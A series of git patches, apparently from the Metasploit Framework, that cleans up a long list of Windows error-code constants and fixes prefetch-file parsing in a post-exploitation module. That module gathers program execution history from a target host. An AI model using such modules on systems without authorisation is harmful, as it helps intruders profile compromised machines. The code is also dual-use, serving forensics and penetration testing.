ERROR_EVT_VERSION_TOO_NEW = 0x3ABB + ERROR_EVT_CANNOT_OPEN_CHANNEL_OF_QUERY = 0x3ABC + ERROR_EVT_PUBLISHER_DISABLED = 0x3ABD + ERROR_EVT_FILTER_OUT_OF_RANGE = 0x3ABE + ERROR_EC_SUBSCRIPTION_CANNOT_ACTIVATE = 0x3AE8 + ERROR_EC_LOG_DISABLED = 0x3AE9 + ERROR_EC_CIRCULAR_FORWARDING = 0x3AEA + ERROR_EC_CREDSTORE_FULL = 0x3AEB + ERROR_EC_CRED_NOT_FOUND = 0x3AEC + ERROR_EC_NO_ACTIVE_CHANNEL = 0x3AED + ERROR_MUI_FILE_NOT_FOUND = 0x3AFC + ERROR_MUI_INVALID_FILE = 0x3AFD + ERROR_MUI_INVALID_RC_CONFIG = 0x3AFE + ERROR_MUI_INVALID_LOCALE_NAME = 0x3AFF + ERROR_MUI_INVALID_ULTIMATEFALLBACK_NAME = 0x3B00 + ERROR_MUI_FILE_NOT_LOADED = 0x3B01 + ERROR_RESOURCE_ENUM_USER_STOP = 0x3B02 + ERROR_MUI_INTLSETTINGS_UILANG_NOT_INSTALLED = 0x3B03 + ERROR_MUI_INTLSETTINGS_INVALID_LOCALE_NAME = 0x3B04 + ERROR_MCA_INVALID_CAPABILITIES_STRING = 0x3B60 + ERROR_MCA_INVALID_VCP_VERSION = 0x3B61 + ERROR_MCA_MONITOR_VIOLATES_MCCS_SPECIFICATION = 0x3B62 + ERROR_MCA_MCCS_VERSION_MISMATCH = 0x3B63 + ERROR_MCA_UNSUPPORTED_MCCS_VERSION = 0x3B64 + ERROR_MCA_INTERNAL_ERROR = 0x3B65 + ERROR_MCA_INVALID_TECHNOLOGY_TYPE_RETURNED = 0x3B66 + ERROR_MCA_UNSUPPORTED_COLOR_TEMPERATURE = 0x3B67 + ERROR_AMBIGUOUS_SYSTEM_DEVICE = 0x3B92 + ERROR_SYSTEM_DEVICE_NOT_FOUND = 0x3BC3 + ERROR_HASH_NOT_SUPPORTED = 0x3BC4 + ERROR_HASH_NOT_PRESENT = 0x3BC5 + end From c9084bd2d557d58bec724fb63f3be4050b6a4e02 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 16 Dec 2013 18:53:37 +0000 Subject: [PATCH 058/205] Remove errant fullstops --- lib/msf/core/post/windows.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/post/windows.rb b/lib/msf/core/post/windows.rb index 6b9c98c81f..cbfd6966f6 100644 --- a/lib/msf/core/post/windows.rb +++ b/lib/msf/core/post/windows.rb @@ -921,7 +921,7 @@ module Msf::Post::Windows ERROR_INSTALL_NOTUSED = 0x0662 ERROR_PATCH_PACKAGE_OPEN_FAILED = 0x0663 ERROR_PATCH_PACKAGE_INVALID = 0x0664 - ERROR_PATCH_PACKAGE_UNSUPPORTED. = 0x0665 + ERROR_PATCH_PACKAGE_UNSUPPORTED = 0x0665 ERROR_PRODUCT_VERSION = 0x0666 ERROR_INVALID_COMMAND_LINE = 0x0667 ERROR_INSTALL_REMOTE_DISALLOWED = 0x0668 @@ -1912,7 +1912,7 @@ module Msf::Post::Windows ERROR_DS_LOOKUP_FAILURE = 0x214C ERROR_DS_COULDNT_UPDATE_SPNS = 0x214D ERROR_DS_CANT_RETRIEVE_SD = 0x214E - ERROR_DS_KEY_NOT_UNIQUE. = 0x214F + ERROR_DS_KEY_NOT_UNIQUE = 0x214F ERROR_DS_WRONG_LINKED_ATT_SYNTAX = 0x2150 ERROR_DS_SAM_NEED_BOOTKEY_PASSWORD = 0x2151 ERROR_DS_SAM_NEED_BOOTKEY_FLOPPY = 0x2152 From 446db788185e4243956269e1d669e79a607efb40 Mon Sep 17 00:00:00 2001 From: jiuweigui Date: Mon, 16 Dec 2013 21:33:07 +0200 Subject: [PATCH 059/205] Minor fix to gather_pf_info function --- modules/post/windows/gather/enum_prefetch.rb | 38 ++++++++++---------- 1 file changed, 19 insertions(+), 19 deletions(-) diff --git a/modules/post/windows/gather/enum_prefetch.rb b/modules/post/windows/gather/enum_prefetch.rb index 584155976c..81ca4376a6 100644 --- a/modules/post/windows/gather/enum_prefetch.rb +++ b/modules/post/windows/gather/enum_prefetch.rb @@ -66,23 +66,23 @@ class Metasploit3 < Msf::Post # from the system. prefetch_file = read_file(filename) - if prefetch_file.empty? or prefetch_file.nil? + if prefetch_file.blank? print_error("Couldn't read file: #{filename}") return nil else # First we extract the saved filename - pf_filename = prefetch_file[name_offset..name_offset+60] + pf_filename = prefetch_file[name_offset, 60] idx = pf_filename.index("\x00\x00") name = Rex::Text.to_ascii(pf_filename.slice(0..idx)) # Then we get the runcount - run_count = prefetch_file[runcount_offset..runcount_offset+4].unpack('L*')[0].to_s + run_count = prefetch_file[runcount_offset, 4].unpack('v')[0] # Then the filepath hash - path_hash = prefetch_file[hash_offset..hash_offset+4].unpack('h8')[0].reverse.upcase.to_s + path_hash = prefetch_file[hash_offset, 4].unpack('h*')[0].upcase.reverse # Last we get the latest execution time - filetime_a = prefetch_file[filetime_offset..(filetime_offset+16)].unpack('q*') + filetime_a = prefetch_file[filetime_offset, 16].unpack('q*') filetime = filetime_a[0] + filetime_a[1] last_exec = Time.at((filetime - 116444736000000000) / 10000000).utc.to_s @@ -93,32 +93,32 @@ class Metasploit3 < Msf::Post # First we'll use specific offsets for finding out the location # and length of the filepath so that we can find it. filepath = [] - fpath_offset = prefetch_file[0x64..0x68].unpack('h4')[0].reverse.to_i(16) - fpath_length = prefetch_file[0x68..0x6C].unpack('h4')[0].reverse.to_i(16) - filepath_data = prefetch_file[fpath_offset..(fpath_offset+fpath_length)] + fpath_offset = prefetch_file[0x64, 2].unpack('v').first + fpath_length = prefetch_file[0x68, 2].unpack('v').first + filepath_data = prefetch_file[fpath_offset, fpath_length] # This part will extract the filepath so that we can find and # compare its contents to the filename we found previously. This # allows us to find the filepath (if it can be found inside the # prefetch file) used to execute the program # referenced in the prefetch-file. - - if not filepath_data.nil? or not filepath_data.emtpy? - fpath_data_array = filepath_data.split("\x00\x00\x00") + unless filepath_data.blank? + fpath_data_array = filepath_data.split("\\\x00D\x00E\x00V\x00I\x00C\x00E") fpath_data_array.each do |path| - fpath_entry_data = path.split("\\") - fpath_entry_filename = fpath_entry_data.last - if not fpath_entry_filename.nil? - fpath_name = fpath_entry_filename.gsub(/\0/, '') - if name == fpath_name[0..29] - fpath_path = path.gsub(/\0/, '') - filepath = fpath_path + unless path.blank? + fpath_name = path.split("\\").last.gsub(/\0/, '') + if fpath_name == name + filepath << path end end end end end - return [last_exec, path_hash, run_count, name, filepath] + if filepath.blank? + filepath << "*** Filepath not found ***" + end + + return [last_exec, path_hash, run_count, name, filepath[0]] end def run From 57f2027e51a3eace0c9043268e1baf8e0ef70718 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 16 Dec 2013 19:45:52 +0000 Subject: [PATCH 060/205] Move to module --- lib/msf/core/post/windows.rb | 2530 +------------------------- lib/msf/core/post/windows/errors.rb | 2531 +++++++++++++++++++++++++++ 2 files changed, 2532 insertions(+), 2529 deletions(-) create mode 100644 lib/msf/core/post/windows/errors.rb diff --git a/lib/msf/core/post/windows.rb b/lib/msf/core/post/windows.rb index cbfd6966f6..92467600b2 100644 --- a/lib/msf/core/post/windows.rb +++ b/lib/msf/core/post/windows.rb @@ -1,5 +1,6 @@ module Msf::Post::Windows + require 'msf/core/post/windows/errors' require 'msf/core/post/windows/accounts' require 'msf/core/post/windows/cli_parse' require 'msf/core/post/windows/eventlog' @@ -12,2533 +13,4 @@ module Msf::Post::Windows require 'msf/core/post/windows/services' require 'msf/core/post/windows/shadowcopy' require 'msf/core/post/windows/user_profiles' - - ERROR_SUCCESS = 0x0000 - ERROR_INVALID_FUNCTION = 0x0001 - ERROR_FILE_NOT_FOUND = 0x0002 - ERROR_PATH_NOT_FOUND = 0x0003 - ERROR_TOO_MANY_OPEN_FILES = 0x0004 - ERROR_ACCESS_DENIED = 0x0005 - ERROR_INVALID_HANDLE = 0x0006 - ERROR_ARENA_TRASHED = 0x0007 - ERROR_NOT_ENOUGH_MEMORY = 0x0008 - ERROR_INVALID_BLOCK = 0x0009 - ERROR_BAD_ENVIRONMENT = 0x000A - ERROR_BAD_FORMAT = 0x000B - ERROR_INVALID_ACCESS = 0x000C - ERROR_INVALID_DATA = 0x000D - ERROR_OUTOFMEMORY = 0x000E - ERROR_INVALID_DRIVE = 0x000F - ERROR_CURRENT_DIRECTORY = 0x0010 - ERROR_NOT_SAME_DEVICE = 0x0011 - ERROR_NO_MORE_FILES = 0x0012 - ERROR_WRITE_PROTECT = 0x0013 - ERROR_BAD_UNIT = 0x0014 - ERROR_NOT_READY = 0x0015 - ERROR_BAD_COMMAND = 0x0016 - ERROR_CRC = 0x0017 - ERROR_BAD_LENGTH = 0x0018 - ERROR_SEEK = 0x0019 - ERROR_NOT_DOS_DISK = 0x001A - ERROR_SECTOR_NOT_FOUND = 0x001B - ERROR_OUT_OF_PAPER = 0x001C - ERROR_WRITE_FAULT = 0x001D - ERROR_READ_FAULT = 0x001E - ERROR_GEN_FAILURE = 0x001F - ERROR_SHARING_VIOLATION = 0x0020 - ERROR_LOCK_VIOLATION = 0x0021 - ERROR_WRONG_DISK = 0x0022 - ERROR_SHARING_BUFFER_EXCEEDED = 0x0024 - ERROR_HANDLE_EOF = 0x0026 - ERROR_HANDLE_DISK_FULL = 0x0027 - ERROR_NOT_SUPPORTED = 0x0032 - ERROR_REM_NOT_LIST = 0x0033 - ERROR_DUP_NAME = 0x0034 - ERROR_BAD_NETPATH = 0x0035 - ERROR_NETWORK_BUSY = 0x0036 - ERROR_DEV_NOT_EXIST = 0x0037 - ERROR_TOO_MANY_CMDS = 0x0038 - ERROR_ADAP_HDW_ERR = 0x0039 - ERROR_BAD_NET_RESP = 0x003A - ERROR_UNEXP_NET_ERR = 0x003B - ERROR_BAD_REM_ADAP = 0x003C - ERROR_PRINTQ_FULL = 0x003D - ERROR_NO_SPOOL_SPACE = 0x003E - ERROR_PRINT_CANCELLED = 0x003F - ERROR_NETNAME_DELETED = 0x0040 - ERROR_NETWORK_ACCESS_DENIED = 0x0041 - ERROR_BAD_DEV_TYPE = 0x0042 - ERROR_BAD_NET_NAME = 0x0043 - ERROR_TOO_MANY_NAMES = 0x0044 - ERROR_TOO_MANY_SESS = 0x0045 - ERROR_SHARING_PAUSED = 0x0046 - ERROR_REQ_NOT_ACCEP = 0x0047 - ERROR_REDIR_PAUSED = 0x0048 - ERROR_FILE_EXISTS = 0x0050 - ERROR_CANNOT_MAKE = 0x0052 - ERROR_FAIL_I24 = 0x0053 - ERROR_OUT_OF_STRUCTURES = 0x0054 - ERROR_ALREADY_ASSIGNED = 0x0055 - ERROR_INVALID_PASSWORD = 0x0056 - ERROR_INVALID_PARAMETER = 0x0057 - ERROR_NET_WRITE_FAULT = 0x0058 - ERROR_NO_PROC_SLOTS = 0x0059 - ERROR_TOO_MANY_SEMAPHORES = 0x0064 - ERROR_EXCL_SEM_ALREADY_OWNED = 0x0065 - ERROR_SEM_IS_SET = 0x0066 - ERROR_TOO_MANY_SEM_REQUESTS = 0x0067 - ERROR_INVALID_AT_INTERRUPT_TIME = 0x0068 - ERROR_SEM_OWNER_DIED = 0x0069 - ERROR_SEM_USER_LIMIT = 0x006A - ERROR_DISK_CHANGE = 0x006B - ERROR_DRIVE_LOCKED = 0x006C - ERROR_BROKEN_PIPE = 0x006D - ERROR_OPEN_FAILED = 0x006E - ERROR_BUFFER_OVERFLOW = 0x006F - ERROR_DISK_FULL = 0x0070 - ERROR_NO_MORE_SEARCH_HANDLES = 0x0071 - ERROR_INVALID_TARGET_HANDLE = 0x0072 - ERROR_INVALID_CATEGORY = 0x0075 - ERROR_INVALID_VERIFY_SWITCH = 0x0076 - ERROR_BAD_DRIVER_LEVEL = 0x0077 - ERROR_CALL_NOT_IMPLEMENTED = 0x0078 - ERROR_SEM_TIMEOUT = 0x0079 - ERROR_INSUFFICIENT_BUFFER = 0x007A - ERROR_INVALID_NAME = 0x007B - ERROR_INVALID_LEVEL = 0x007C - ERROR_NO_VOLUME_LABEL = 0x007D - ERROR_MOD_NOT_FOUND = 0x007E - ERROR_PROC_NOT_FOUND = 0x007F - ERROR_WAIT_NO_CHILDREN = 0x0080 - ERROR_CHILD_NOT_COMPLETE = 0x0081 - ERROR_DIRECT_ACCESS_HANDLE = 0x0082 - ERROR_NEGATIVE_SEEK = 0x0083 - ERROR_SEEK_ON_DEVICE = 0x0084 - ERROR_IS_JOIN_TARGET = 0x0085 - ERROR_IS_JOINED = 0x0086 - ERROR_IS_SUBSTED = 0x0087 - ERROR_NOT_JOINED = 0x0088 - ERROR_NOT_SUBSTED = 0x0089 - ERROR_JOIN_TO_JOIN = 0x008A - ERROR_SUBST_TO_SUBST = 0x008B - ERROR_JOIN_TO_SUBST = 0x008C - ERROR_SUBST_TO_JOIN = 0x008D - ERROR_BUSY_DRIVE = 0x008E - ERROR_SAME_DRIVE = 0x008F - ERROR_DIR_NOT_ROOT = 0x0090 - ERROR_DIR_NOT_EMPTY = 0x0091 - ERROR_IS_SUBST_PATH = 0x0092 - ERROR_IS_JOIN_PATH = 0x0093 - ERROR_PATH_BUSY = 0x0094 - ERROR_IS_SUBST_TARGET = 0x0095 - ERROR_SYSTEM_TRACE = 0x0096 - ERROR_INVALID_EVENT_COUNT = 0x0097 - ERROR_TOO_MANY_MUXWAITERS = 0x0098 - ERROR_INVALID_LIST_FORMAT = 0x0099 - ERROR_LABEL_TOO_LONG = 0x009A - ERROR_TOO_MANY_TCBS = 0x009B - ERROR_SIGNAL_REFUSED = 0x009C - ERROR_DISCARDED = 0x009D - ERROR_NOT_LOCKED = 0x009E - ERROR_BAD_THREADID_ADDR = 0x009F - ERROR_BAD_ARGUMENTS = 0x00A0 - ERROR_BAD_PATHNAME = 0x00A1 - ERROR_SIGNAL_PENDING = 0x00A2 - ERROR_MAX_THRDS_REACHED = 0x00A4 - ERROR_LOCK_FAILED = 0x00A7 - ERROR_BUSY = 0x00AA - ERROR_CANCEL_VIOLATION = 0x00AD - ERROR_ATOMIC_LOCKS_NOT_SUPPORTED = 0x00AE - ERROR_INVALID_SEGMENT_NUMBER = 0x00B4 - ERROR_INVALID_ORDINAL = 0x00B6 - ERROR_ALREADY_EXISTS = 0x00B7 - ERROR_INVALID_FLAG_NUMBER = 0x00BA - ERROR_SEM_NOT_FOUND = 0x00BB - ERROR_INVALID_STARTING_CODESEG = 0x00BC - ERROR_INVALID_STACKSEG = 0x00BD - ERROR_INVALID_MODULETYPE = 0x00BE - ERROR_INVALID_EXE_SIGNATURE = 0x00BF - ERROR_EXE_MARKED_INVALID = 0x00C0 - ERROR_BAD_EXE_FORMAT = 0x00C1 - ERROR_ITERATED_DATA_EXCEEDS_64k = 0x00C2 - ERROR_INVALID_MINALLOCSIZE = 0x00C3 - ERROR_DYNLINK_FROM_INVALID_RING = 0x00C4 - ERROR_IOPL_NOT_ENABLED = 0x00C5 - ERROR_INVALID_SEGDPL = 0x00C6 - ERROR_AUTODATASEG_EXCEEDS_64k = 0x00C7 - ERROR_RING2SEG_MUST_BE_MOVABLE = 0x00C8 - ERROR_RELOC_CHAIN_XEEDS_SEGLIM = 0x00C9 - ERROR_INFLOOP_IN_RELOC_CHAIN = 0x00CA - ERROR_ENVVAR_NOT_FOUND = 0x00CB - ERROR_NO_SIGNAL_SENT = 0x00CD - ERROR_FILENAME_EXCED_RANGE = 0x00CE - ERROR_RING2_STACK_IN_USE = 0x00CF - ERROR_META_EXPANSION_TOO_LONG = 0x00D0 - ERROR_INVALID_SIGNAL_NUMBER = 0x00D1 - ERROR_THREAD_1_INACTIVE = 0x00D2 - ERROR_LOCKED = 0x00D4 - ERROR_TOO_MANY_MODULES = 0x00D6 - ERROR_NESTING_NOT_ALLOWED = 0x00D7 - ERROR_EXE_MACHINE_TYPE_MISMATCH = 0x00D8 - ERROR_EXE_CANNOT_MODIFY_SIGNED_BINARY = 0x00D9 - ERROR_EXE_CANNOT_MODIFY_STRONG_SIGNED_BINARY = 0x00DA - ERROR_FILE_CHECKED_OUT = 0x00DC - ERROR_CHECKOUT_REQUIRED = 0x00DD - ERROR_BAD_FILE_TYPE = 0x00DE - ERROR_FILE_TOO_LARGE = 0x00DF - ERROR_FORMS_AUTH_REQUIRED = 0x00E0 - ERROR_VIRUS_INFECTED = 0x00E1 - ERROR_VIRUS_DELETED = 0x00E2 - ERROR_PIPE_LOCAL = 0x00E5 - ERROR_BAD_PIPE = 0x00E6 - ERROR_PIPE_BUSY = 0x00E7 - ERROR_NO_DATA = 0x00E8 - ERROR_PIPE_NOT_CONNECTED = 0x00E9 - ERROR_MORE_DATA = 0x00EA - ERROR_VC_DISCONNECTED = 0x00F0 - ERROR_INVALID_EA_NAME = 0x00FE - ERROR_EA_LIST_INCONSISTENT = 0x00FF - ERROR_WAIT_TIMEOUT = 0x0102 - ERROR_NO_MORE_ITEMS = 0x0103 - ERROR_CANNOT_COPY = 0x010A - ERROR_DIRECTORY = 0x010B - ERROR_EAS_DIDNT_FIT = 0x0113 - ERROR_EA_FILE_CORRUPT = 0x0114 - ERROR_EA_TABLE_FULL = 0x0115 - ERROR_INVALID_EA_HANDLE = 0x0116 - ERROR_EAS_NOT_SUPPORTED = 0x011A - ERROR_NOT_OWNER = 0x0120 - ERROR_TOO_MANY_POSTS = 0x012A - ERROR_PARTIAL_COPY = 0x012B - ERROR_OPLOCK_NOT_GRANTED = 0x012C - ERROR_INVALID_OPLOCK_PROTOCOL = 0x012D - ERROR_DISK_TOO_FRAGMENTED = 0x012E - ERROR_DELETE_PENDING = 0x012F - ERROR_INCOMPATIBLE_WITH_GLOBAL_SHORT_NAME_REGISTRY_SETTING = 0x0130 - ERROR_SHORT_NAMES_NOT_ENABLED_ON_VOLUME = 0x0131 - ERROR_SECURITY_STREAM_IS_INCONSISTENT = 0x0132 - ERROR_INVALID_LOCK_RANGE = 0x0133 - ERROR_IMAGE_SUBSYSTEM_NOT_PRESENT = 0x0134 - ERROR_NOTIFICATION_GUID_ALREADY_DEFINED = 0x0135 - ERROR_MR_MID_NOT_FOUND = 0x013D - ERROR_SCOPE_NOT_FOUND = 0x013E - ERROR_FAIL_NOACTION_REBOOT = 0x015E - ERROR_FAIL_SHUTDOWN = 0x015F - ERROR_FAIL_RESTART = 0x0160 - ERROR_MAX_SESSIONS_REACHED = 0x0161 - ERROR_THREAD_MODE_ALREADY_BACKGROUND = 0x0190 - ERROR_THREAD_MODE_NOT_BACKGROUND = 0x0191 - ERROR_PROCESS_MODE_ALREADY_BACKGROUND = 0x0192 - ERROR_PROCESS_MODE_NOT_BACKGROUND = 0x0193 - ERROR_INVALID_ADDRESS = 0x01E7 - ERROR_USER_PROFILE_LOAD = 0x01F4 - ERROR_ARITHMETIC_OVERFLOW = 0x0216 - ERROR_PIPE_CONNECTED = 0x0217 - ERROR_PIPE_LISTENING = 0x0218 - ERROR_VERIFIER_STOP = 0x0219 - ERROR_ABIOS_ERROR = 0x021A - ERROR_WX86_WARNING = 0x021B - ERROR_WX86_ERROR = 0x021C - ERROR_TIMER_NOT_CANCELED = 0x021D - ERROR_UNWIND = 0x021E - ERROR_BAD_STACK = 0x021F - ERROR_INVALID_UNWIND_TARGET = 0x0220 - ERROR_INVALID_PORT_ATTRIBUTES = 0x0221 - ERROR_PORT_MESSAGE_TOO_LONG = 0x0222 - ERROR_INVALID_QUOTA_LOWER = 0x0223 - ERROR_DEVICE_ALREADY_ATTACHED = 0x0224 - ERROR_INSTRUCTION_MISALIGNMENT = 0x0225 - ERROR_PROFILING_NOT_STARTED = 0x0226 - ERROR_PROFILING_NOT_STOPPED = 0x0227 - ERROR_COULD_NOT_INTERPRET = 0x0228 - ERROR_PROFILING_AT_LIMIT = 0x0229 - ERROR_CANT_WAIT = 0x022A - ERROR_CANT_TERMINATE_SELF = 0x022B - ERROR_UNEXPECTED_MM_CREATE_ERR = 0x022C - ERROR_UNEXPECTED_MM_MAP_ERROR = 0x022D - ERROR_UNEXPECTED_MM_EXTEND_ERR = 0x022E - ERROR_BAD_FUNCTION_TABLE = 0x022F - ERROR_NO_GUID_TRANSLATION = 0x0230 - ERROR_INVALID_LDT_SIZE = 0x0231 - ERROR_INVALID_LDT_OFFSET = 0x0233 - ERROR_INVALID_LDT_DESCRIPTOR = 0x0234 - ERROR_TOO_MANY_THREADS = 0x0235 - ERROR_THREAD_NOT_IN_PROCESS = 0x0236 - ERROR_PAGEFILE_QUOTA_EXCEEDED = 0x0237 - ERROR_LOGON_SERVER_CONFLICT = 0x0238 - ERROR_SYNCHRONIZATION_REQUIRED = 0x0239 - ERROR_NET_OPEN_FAILED = 0x023A - ERROR_IO_PRIVILEGE_FAILED = 0x023B - ERROR_CONTROL_C_EXIT = 0x023C - ERROR_MISSING_SYSTEMFILE = 0x023D - ERROR_UNHANDLED_EXCEPTION = 0x023E - ERROR_APP_INIT_FAILURE = 0x023F - ERROR_PAGEFILE_CREATE_FAILED = 0x0240 - ERROR_INVALID_IMAGE_HASH = 0x0241 - ERROR_NO_PAGEFILE = 0x0242 - ERROR_ILLEGAL_FLOAT_CONTEXT = 0x0243 - ERROR_NO_EVENT_PAIR = 0x0244 - ERROR_DOMAIN_CTRLR_CONFIG_ERROR = 0x0245 - ERROR_ILLEGAL_CHARACTER = 0x0246 - ERROR_UNDEFINED_CHARACTER = 0x0247 - ERROR_FLOPPY_VOLUME = 0x0248 - ERROR_BIOS_FAILED_TO_CONNECT_INTERRUPT = 0x0249 - ERROR_BACKUP_CONTROLLER = 0x024A - ERROR_MUTANT_LIMIT_EXCEEDED = 0x024B - ERROR_FS_DRIVER_REQUIRED = 0x024C - ERROR_CANNOT_LOAD_REGISTRY_FILE = 0x024D - ERROR_DEBUG_ATTACH_FAILED = 0x024E - ERROR_SYSTEM_PROCESS_TERMINATED = 0x024F - ERROR_DATA_NOT_ACCEPTED = 0x0250 - ERROR_VDM_HARD_ERROR = 0x0251 - ERROR_DRIVER_CANCEL_TIMEOUT = 0x0252 - ERROR_REPLY_MESSAGE_MISMATCH = 0x0253 - ERROR_LOST_WRITEBEHIND_DATA = 0x0254 - ERROR_CLIENT_SERVER_PARAMETERS_INVALID = 0x0255 - ERROR_NOT_TINY_STREAM = 0x0256 - ERROR_STACK_OVERFLOW_READ = 0x0257 - ERROR_CONVERT_TO_LARGE = 0x0258 - ERROR_FOUND_OUT_OF_SCOPE = 0x0259 - ERROR_ALLOCATE_BUCKET = 0x025A - ERROR_MARSHALL_OVERFLOW = 0x025B - ERROR_INVALID_VARIANT = 0x025C - ERROR_BAD_COMPRESSION_BUFFER = 0x025D - ERROR_AUDIT_FAILED = 0x025E - ERROR_TIMER_RESOLUTION_NOT_SET = 0x025F - ERROR_INSUFFICIENT_LOGON_INFO = 0x0260 - ERROR_BAD_DLL_ENTRYPOINT = 0x0261 - ERROR_BAD_SERVICE_ENTRYPOINT = 0x0262 - ERROR_IP_ADDRESS_CONFLICT1 = 0x0263 - ERROR_IP_ADDRESS_CONFLICT2 = 0x0264 - ERROR_REGISTRY_QUOTA_LIMIT = 0x0265 - ERROR_NO_CALLBACK_ACTIVE = 0x0266 - ERROR_PWD_TOO_SHORT = 0x0267 - ERROR_PWD_TOO_RECENT = 0x0268 - ERROR_PWD_HISTORY_CONFLICT = 0x0269 - ERROR_UNSUPPORTED_COMPRESSION = 0x026A - ERROR_INVALID_HW_PROFILE = 0x026B - ERROR_INVALID_PLUGPLAY_DEVICE_PATH = 0x026C - ERROR_QUOTA_LIST_INCONSISTENT = 0x026D - ERROR_EVALUATION_EXPIRATION = 0x026E - ERROR_ILLEGAL_DLL_RELOCATION = 0x026F - ERROR_DLL_INIT_FAILED_LOGOFF = 0x0270 - ERROR_VALIDATE_CONTINUE = 0x0271 - ERROR_NO_MORE_MATCHES = 0x0272 - ERROR_RANGE_LIST_CONFLICT = 0x0273 - ERROR_SERVER_SID_MISMATCH = 0x0274 - ERROR_CANT_ENABLE_DENY_ONLY = 0x0275 - ERROR_FLOAT_MULTIPLE_FAULTS = 0x0276 - ERROR_FLOAT_MULTIPLE_TRAPS = 0x0277 - ERROR_NOINTERFACE = 0x0278 - ERROR_DRIVER_FAILED_SLEEP = 0x0279 - ERROR_CORRUPT_SYSTEM_FILE = 0x027A - ERROR_COMMITMENT_MINIMUM = 0x027B - ERROR_PNP_RESTART_ENUMERATION = 0x027C - ERROR_SYSTEM_IMAGE_BAD_SIGNATURE = 0x027D - ERROR_PNP_REBOOT_REQUIRED = 0x027E - ERROR_INSUFFICIENT_POWER = 0x027F - ERROR_MULTIPLE_FAULT_VIOLATION = 0x0280 - ERROR_SYSTEM_SHUTDOWN = 0x0281 - ERROR_PORT_NOT_SET = 0x0282 - ERROR_DS_VERSION_CHECK_FAILURE = 0x0283 - ERROR_RANGE_NOT_FOUND = 0x0284 - ERROR_NOT_SAFE_MODE_DRIVER = 0x0286 - ERROR_FAILED_DRIVER_ENTRY = 0x0287 - ERROR_DEVICE_ENUMERATION_ERROR = 0x0288 - ERROR_MOUNT_POINT_NOT_RESOLVED = 0x0289 - ERROR_INVALID_DEVICE_OBJECT_PARAMETER = 0x028A - ERROR_MCA_OCCURED = 0x028B - ERROR_DRIVER_DATABASE_ERROR = 0x028C - ERROR_SYSTEM_HIVE_TOO_LARGE = 0x028D - ERROR_DRIVER_FAILED_PRIOR_UNLOAD = 0x028E - ERROR_VOLSNAP_PREPARE_HIBERNATE = 0x028F - ERROR_HIBERNATION_FAILURE = 0x0290 - ERROR_FILE_SYSTEM_LIMITATION = 0x0299 - ERROR_ASSERTION_FAILURE = 0x029C - ERROR_ACPI_ERROR = 0x029D - ERROR_WOW_ASSERTION = 0x029E - ERROR_PNP_BAD_MPS_TABLE = 0x029F - ERROR_PNP_TRANSLATION_FAILED = 0x02A0 - ERROR_PNP_IRQ_TRANSLATION_FAILED = 0x02A1 - ERROR_PNP_INVALID_ID = 0x02A2 - ERROR_WAKE_SYSTEM_DEBUGGER = 0x02A3 - ERROR_HANDLES_CLOSED = 0x02A4 - ERROR_EXTRANEOUS_INFORMATION = 0x02A5 - ERROR_RXACT_COMMIT_NECESSARY = 0x02A6 - ERROR_MEDIA_CHECK = 0x02A7 - ERROR_GUID_SUBSTITUTION_MADE = 0x02A8 - ERROR_STOPPED_ON_SYMLINK = 0x02A9 - ERROR_LONGJUMP = 0x02AA - ERROR_PLUGPLAY_QUERY_VETOED = 0x02AB - ERROR_UNWIND_CONSOLIDATE = 0x02AC - ERROR_REGISTRY_HIVE_RECOVERED = 0x02AD - ERROR_DLL_MIGHT_BE_INSECURE = 0x02AE - ERROR_DLL_MIGHT_BE_INCOMPATIBLE = 0x02AF - ERROR_DBG_EXCEPTION_NOT_HANDLED = 0x02B0 - ERROR_DBG_REPLY_LATER = 0x02B1 - ERROR_DBG_UNABLE_TO_PROVIDE_HANDLE = 0x02B2 - ERROR_DBG_TERMINATE_THREAD = 0x02B3 - ERROR_DBG_TERMINATE_PROCESS = 0x02B4 - ERROR_DBG_CONTROL_C = 0x02B5 - ERROR_DBG_PRINTEXCEPTION_C = 0x02B6 - ERROR_DBG_RIPEXCEPTION = 0x02B7 - ERROR_DBG_CONTROL_BREAK = 0x02B8 - ERROR_DBG_COMMAND_EXCEPTION = 0x02B9 - ERROR_OBJECT_NAME_EXISTS = 0x02BA - ERROR_THREAD_WAS_SUSPENDED = 0x02BB - ERROR_IMAGE_NOT_AT_BASE = 0x02BC - ERROR_RXACT_STATE_CREATED = 0x02BD - ERROR_SEGMENT_NOTIFICATION = 0x02BE - ERROR_BAD_CURRENT_DIRECTORY = 0x02BF - ERROR_FT_READ_RECOVERY_FROM_BACKUP = 0x02C0 - ERROR_FT_WRITE_RECOVERY = 0x02C1 - ERROR_IMAGE_MACHINE_TYPE_MISMATCH = 0x02C2 - ERROR_RECEIVE_PARTIAL = 0x02C3 - ERROR_RECEIVE_EXPEDITED = 0x02C4 - ERROR_RECEIVE_PARTIAL_EXPEDITED = 0x02C5 - ERROR_EVENT_DONE = 0x02C6 - ERROR_EVENT_PENDING = 0x02C7 - ERROR_CHECKING_FILE_SYSTEM = 0x02C8 - ERROR_FATAL_APP_EXIT = 0x02C9 - ERROR_PREDEFINED_HANDLE = 0x02CA - ERROR_WAS_UNLOCKED = 0x02CB - ERROR_SERVICE_NOTIFICATION = 0x02CC - ERROR_WAS_LOCKED = 0x02CD - ERROR_LOG_HARD_ERROR = 0x02CE - ERROR_ALREADY_WIN32 = 0x02CF - ERROR_IMAGE_MACHINE_TYPE_MISMATCH_EXE = 0x02D0 - ERROR_NO_YIELD_PERFORMED = 0x02D1 - ERROR_TIMER_RESUME_IGNORED = 0x02D2 - ERROR_ARBITRATION_UNHANDLED = 0x02D3 - ERROR_CARDBUS_NOT_SUPPORTED = 0x02D4 - ERROR_MP_PROCESSOR_MISMATCH = 0x02D5 - ERROR_HIBERNATED = 0x02D6 - ERROR_RESUME_HIBERNATION = 0x02D7 - ERROR_FIRMWARE_UPDATED = 0x02D8 - ERROR_DRIVERS_LEAKING_LOCKED_PAGES = 0x02D9 - ERROR_WAKE_SYSTEM = 0x02DA - ERROR_WAIT_1 = 0x02DB - ERROR_WAIT_2 = 0x02DC - ERROR_WAIT_3 = 0x02DD - ERROR_WAIT_63 = 0x02DE - ERROR_ABANDONED_WAIT_0 = 0x02DF - ERROR_ABANDONED_WAIT_63 = 0x02E0 - ERROR_USER_APC = 0x02E1 - ERROR_KERNEL_APC = 0x02E2 - ERROR_ALERTED = 0x02E3 - ERROR_ELEVATION_REQUIRED = 0x02E4 - ERROR_REPARSE = 0x02E5 - 